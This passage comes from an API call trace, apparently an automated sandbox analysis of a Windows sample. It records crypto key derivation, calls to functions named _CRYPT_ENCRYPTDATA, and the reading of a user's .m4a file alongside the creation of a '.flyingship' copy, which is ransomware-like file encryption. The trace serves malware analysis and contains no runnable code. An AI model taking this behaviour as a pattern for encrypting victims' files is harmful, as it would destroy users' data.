wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0184.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0184.230] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.230] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0184.230] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0184.230] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.230] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0184.231] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0184.231] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0184.231] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.231] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0184.231] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0184.231] CryptDestroyHash (hHash=0x90ae18) returned 1 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0184.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0184.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0184.232] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0184.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0184.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0184.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0184.232] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0184.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0184.232] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.232] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.232] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0184.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0184.234] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\k4co 93mbgwb3udhm.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0184.234] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.234] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0184.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0184.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.234] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0184.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0184.234] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.235] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0184.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.flyingship.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\k4co 93mbgwb3udhm.flyingship.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0184.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0184.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0184.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.237] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0184.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.238] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.238] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0184.238] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0184.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0184.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.238] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0184.238] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x64c5, lpOverlapped=0x0) returned 1 [0184.252] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0184.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x64c5) returned 0xbea018 [0184.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0184.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0184.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0184.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x64c5) returned 0xbf04e8 [0184.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0184.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.253] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0184.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0184.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x64c5) returned 0xbea018 [0184.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0184.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0184.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.254] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0184.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0184.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0184.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0184.254] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0184.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0184.254] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0184.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x64c5) returned 0xbea018 [0184.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0184.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0184.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0184.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0184.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x64c5) returned 0xbf69b8 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0184.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0184.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0184.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0184.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0184.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0184.257] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0184.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0184.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0184.257] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0184.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0184.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0184.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0184.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0184.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0184.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0184.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0184.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0184.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0184.258] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0184.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0184.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2878 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0184.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0184.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0184.258] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0184.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0184.259] RtlAllocateHeap 